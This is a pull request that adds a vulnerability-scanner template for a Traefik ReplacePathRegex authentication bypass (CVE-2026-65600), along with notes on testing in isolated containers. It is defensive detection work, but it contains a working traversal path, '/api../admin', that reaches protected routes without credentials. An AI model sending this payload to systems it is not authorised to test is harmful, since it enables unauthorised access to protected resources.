### PR TITLE
Add CVE-2026-65600 template

### DIFF
--- a/http/cves/2026/CVE-2026-65600.yaml
+++ b/http/cves/2026/CVE-2026-65600.yaml
@@ -1,0 +1,56 @@
+id: CVE-2026-65600
+
+info:
+  name: Traefik ReplacePathRegex Authentication Bypass
+  author: str4k3r
+  severity: high
+  description: |
+    Traefik's ReplacePathRegex middleware can forward an unnormalized path
+    when a capture begins immediately after a prefix. A backend that
+    normalizes the path may then expose a protected route without credentials.
+    This detector compares a protected baseline route with the crafted path
+    and is non-mutating (GET-only).
+  impact: |
+    An unauthenticated remote request can traverse a downstream route after
+    Traefik rewrites the path, allowing access to resources that are intended
+    to be protected by authentication middleware.
+  remediation: |
+    Upgrade Traefik to v2.11.52, v3.6.23, v3.7.7, or later, and review
+    ReplacePathRegex rules that capture a path segment without a required
+    separator.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-65600
+    - https://github.com/traefik/traefik/security/advisories/GHSA-cxjq-mrr5-89rv
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
+    cvss-score: 7.8
+    cve-id: CVE-2026-65600
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: traefik
+    product: traefik
+    technology: Go, reverse proxy, ingress controller
+  tags: cve,cve2026,traefik,auth-bypass,path-traversal,cwe22
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin"
+    matchers:
+      - type: status
+        status:
+          - 401
+          - 403
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/api../admin"
+    matchers:
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-65600, Traefik's `ReplacePathRegex` path
normalization authentication bypass. The issue affects deployments that use a
prefix-capturing rule such as `^/api(.*)` with replacement `/$1` in front of a
protected downstream route.

## Detection

The template first establishes that the protected `/admin` route rejects an
unauthenticated request, then sends the documented traversal-shaped path
`/api../admin`. It reports only when the baseline is rejected and the crafted
path is accepted. Both requests are unauthenticated GETs; no data is modified,
and no credentials, callback, or state-changing request is used.

## References

- https://github.com/traefik/traefik/security/advisories/GHSA-cxjq-mrr5-89rv
- https://nvd.nist.gov/vuln/detail/CVE-2026-65600

## Validation

- Vulnerable official Traefik `v3.6.22`: baseline `401`, crafted path `200`
- Fixed official Traefik `v3.6.23`: crafted path rejected with `400`
- Native Nuclei v3.11.0: vulnerable `DETECTED` 3/3; fixed `NOT_DETECTED` 3/3
- Native template validation: passed

The differential was reproduced in disposable isolated containers using the
advisory's `ReplacePathRegex` configuration and a protected downstream route.